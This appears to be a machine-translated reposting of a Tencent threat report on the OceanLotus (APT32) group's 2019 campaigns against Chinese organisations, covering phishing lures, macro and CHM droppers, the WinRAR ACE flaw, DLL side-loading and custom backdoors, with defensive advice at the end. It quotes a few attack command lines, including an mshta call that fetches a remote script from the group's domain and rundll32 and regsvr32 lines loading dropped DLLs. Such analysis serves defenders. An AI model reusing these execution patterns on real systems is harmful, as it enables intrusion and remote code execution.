[email protected] (04) 3795 8282 - (04) 3795 8228 - 1800 556 864
Tình hình tấn công của nhóm Oceanlotus định danh xuất phát từ Việt Nam tại Trung Quốc
.18 Dec

The attack situation of the name Oceanlotus group comes from Vietnam in China

In the first half of 2019, according to Tencent's cybersecurity intelligence center, the OceanLotus group made a public announcement. The targets of this organization are diverse, including government agencies, maritime authorities, diplomatic agencies, large state-owned enterprises, scientific research organizations and a number of private enterprises. China's big.

Through tracking, Tencent discovered that a large number of domestic targets were attacked by this group and that the entire intranet of the target was occupied, able to identify a large amount of confidential information and information. Stolen server configuration. The attackers appear to be very familiar with China as well as understanding China's hot questions and government structure. For example, when a tax reform was just launched, a tax reform plan was immediately used as the subject of an attack.

Sea Lotus (OceanLotus), also known as APT32, is a cyber attack organization identified by many organizations as coming from Vietnam. Since its inception, the group has carried out attacks on China, as well as many other countries around the world.

The attack methods have not changed much from the first detection, but there are some small improvements including attack decoys, payloads, bypassing of security layers ... etc. still in use. After gaining control of the machine, an attacker will scan the entire network. This also shows that APT attacks will not stop until it reaches its goal. As long as the target is valid, the attack will get stronger.

Characteristics of the attack

Attack by phishing email

Sea Lotus through sending fake emails about reputable organizations, users are easily fooled into downloading malicious files themselves. Throughout 2019, lots of phishing emails were sent, such as the following:

The accounts used to send phishing emails are usually NetEase's mailbox. Types of hacked accounts are usually: Sun ** @ 126 [.] Com, Yang ** @ 163 [.] Com, insert ** @ 126 [.] Com ...

Diversify types of decoys
The team used to diversify the bait for the attack and almost all the bait was used. In addition to the malicious Ink, doc, and compressed files of WinRAR ACE (CVE-2018-20250) are mentioned in many reports.

Malicious file as doc:

Decode Chm file

Winrar flaw (CVE-2018-20250)

Various ways to download files
Due to the variety of decoys for phishing, the method of downloading malicious files also varies.

 Direct execution

The executable file is disguised as a DOCX File, with the icon of microsoft word, used to trick users into downloading it. After the user has downloaded DOC file and opened it. After the File opens, the information in the document file is disturbed, enticing the victim to activate the macro code in the document file so that the content within the document can be viewed. In fact, after macros are enabled, normal content is still not displayed

Use Rundll32 to download malicious dll
After executing the malicious code, it will call and execute the actual malicious code {1888B763-A56C-4D4B-895C-2092993ECCBA} in the C: \ User \ Administrator \ AppData \ Local \ Microsoft folder, following That uses Rundll32 to execute the dll:

"C: \ Windows \ system32 \ rundll32.exe" "C: \ Users \ ADMINI ~ 1 \ AppData \ Local \ Microsoft \ {1888B763-A56C-4D4B-895C-2092993ECCBA} .dll", Register
Using a Macro to execute and obfuscated Macro code:

Office memory executes malicious shellcode
By Macro code, decode shellcode directly in Office and create a thread to execute in memory:

Use the DLL
Using DLL (Side-Loading) DLL technique to execute, download malicious files:


Register a malicious DLL as a system component to execute:

Embed command file
Chm file will execute, it prompts to execute ActiveX code:

Script content of file:

However, due to encryption issues, chm is truncated after opening:


After decompression, the original content is as follows:

Continuous attacks use scheduled tasks
After chm is executed, the bcdsrv.dll file will be released under %AppData% \ Roaming and then a scheduled task called WeeklyMaintenance will be created:

Execution command:

C: \ Windows \ System32 \ msiexec.exe -Y

C: \ Users \ Administrator \ AppData \ Roaming \ bcdsrv.dll

Bcdsrv.dll is a really malicious file.

Ink called mstah to make

Detailed analysis of Ink technique called mstah

Once executed, the command is called:

C: \ Windows \ SysWOW64 \ mshta.exe http://api.baidu-json.com/feed/news.html

And new.html is actually a Vbs file that is a file containing executable code.

Use odbcconf.exe to download the file
Odbcconf.exe is a file included with the system. This file can be used to execute the dll file and because the server process is a system file, it may get rid of some security software:

WinRAR ACE vulnerability (CVE-2018-20250)
The compression package with this vulnerability can be structured as follows: In addition to extracting the normal files after decompression, the startup folder (C: \ Users \ Administrator \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Startup) publishes a self-extracting file:

This file is a self-extracting program. On startup, it will issue the file {7026ce06-ee00-4ebd-b00e-f5150d86c13e} .ocx, then issue the command:

regsvr32 / s / i {7026ce06-ee00-4ebd-b00e-f5150d86c13e} .ocx

Multi-load attack
In the latest attack, Sea Lotus used a Multi-load attack. In previous attacks, after decoding the shellcode, the RAT was finally executed directly, such as:

We found that after decoding the shellcode, the shellcode is downloaded and executed first. If the download fails, the pre-installed RAT is loaded:

This makes attack activities richer and more diverse and also controllable.

The circumvention of security software
Sea Lotus also uses a variety of methods to combat security software, mainly:

Use the DLL to execute
Use the executable system file
Can refer to as odbcconf.exe.

Execute shellcode directly in the office
Add junk data to the file to expand the size.
To prevent files from being collected by security vendors, Sea Lotus has intentionally added a large amount of junk data to the resources of certain files to expand the file size.

If a file is full of junk data, the file size is up to 61.4 MB (64,480,256 bytes):

Create a backdoor
The backdoor file is encrypted and customized according to the computer's properties. Therefore, the hash file on each machine is different and cannot be done without information regarding the machine that contains the backdoor. Even if the malware is found by security vendors, as long as there is no data related to the malicious computer, the payload cannot be decoded.

Disguise for CnC connection
According to configuration information, various connections and camouflage can be made, and C2 is assembled and analyzed. CnCs are usually structured (xxx is the C2 configuration):

{rand} .xxx


cdn.xxx api.xxx

Fake HTTP Headers:

Custom backdoor
One of the most impressive techniques used by Sea Lotus was in 2019 (mostly backdoor use in phase 2). This technique has been recently published with malicious files released by each victim machine encrypted using the relevant computer properties (such as the hostname) of the victim and executed. We need part of this information, otherwise we can't decode it.

Therefore, each malicious file released is different and even if it is found by the security provider, as long as there is no victim's related data, the actual payload cannot be decoded.

The backdoor is also executed regarding files and processes including: AdobeUpdate.exe + goopdate.dll, KuGouUpdate.exe + goopdate.dll, XGFileCheck.exe + goopdate.dll, SogouCloud.exe + inetmib1.dll and links Other combinations to execute.

The encoding process is:

Through the example below can see, the username was used for encryption.

The victim username is Cao **. It can be seen that the Trojan was created specifically to infect this computer.

Through the monitoring process, it was noticed that Sea Lotus often used three main types of malware: CobaltStrike's beacon Trojan, modified Trojan Denis and Ghost family. In which CobaltStrike's beacon Trojan and the family Denis Denis are most often discovered, Ghost rarely used.



Ghost is modified:

Hacking the network
After a server has been infected with malware via Email Phishing, Sea Lotus will continue its attacks on internal machines. They conduct scans, searches, attacks on internal machines in as many ways as possible.

Get the hash:

Package file:

There will also be tasks created scheduled to download the tools continuously through Powershell:

The malicious file was detected as goopdate.dll.

Some other activities

During the tracking process, several similar attacks were found as Sea Lotus attacks such as:

The malicious code was eventually executed by two file types:

Beacon payload created by CobaltStrike.
The remaining payload block numverse_http is used by metasploit.
In addition, the CnC of these attacks is often detected in China:

Although there have been recent attacks similar to the actions of Sea Lotus, there are also behaviors that are not the same as that of the SeaLotus.

Summary of Sea Lotus
Sea Lotus is one of the most active APT groups in recent years, regularly attacking areas in China and countries around the world. Many cybersecurity companies have consistently made reports about recent Sea Lotus attacks. This group of Sea Lotus is currently showing no signs of stopping, they are constantly updating attack technologies and techniques, causing a lot of difficulties for security activities. Therefore, users need to increase security awareness, not arbitrarily executing attachments of unknown emails and not be fooled by phishing messages.

Safety recommendations

  • To raise awareness about security, do not open attachments of unknown emails, unless the source is reliable and the purpose is clear, it is not easy to activate Office macros.
  • Install patches and operating system patches for important software such as Office in a timely manner.
  • Use Antivirus software to prevent possible attacks like a Trojan horse.
  • Users and businesses should deploy an early threat detection system like SOC. The SOC system is currently the first choice of security houses.
    The related IOC 


Source: mp.weixin.qq.com

Write a post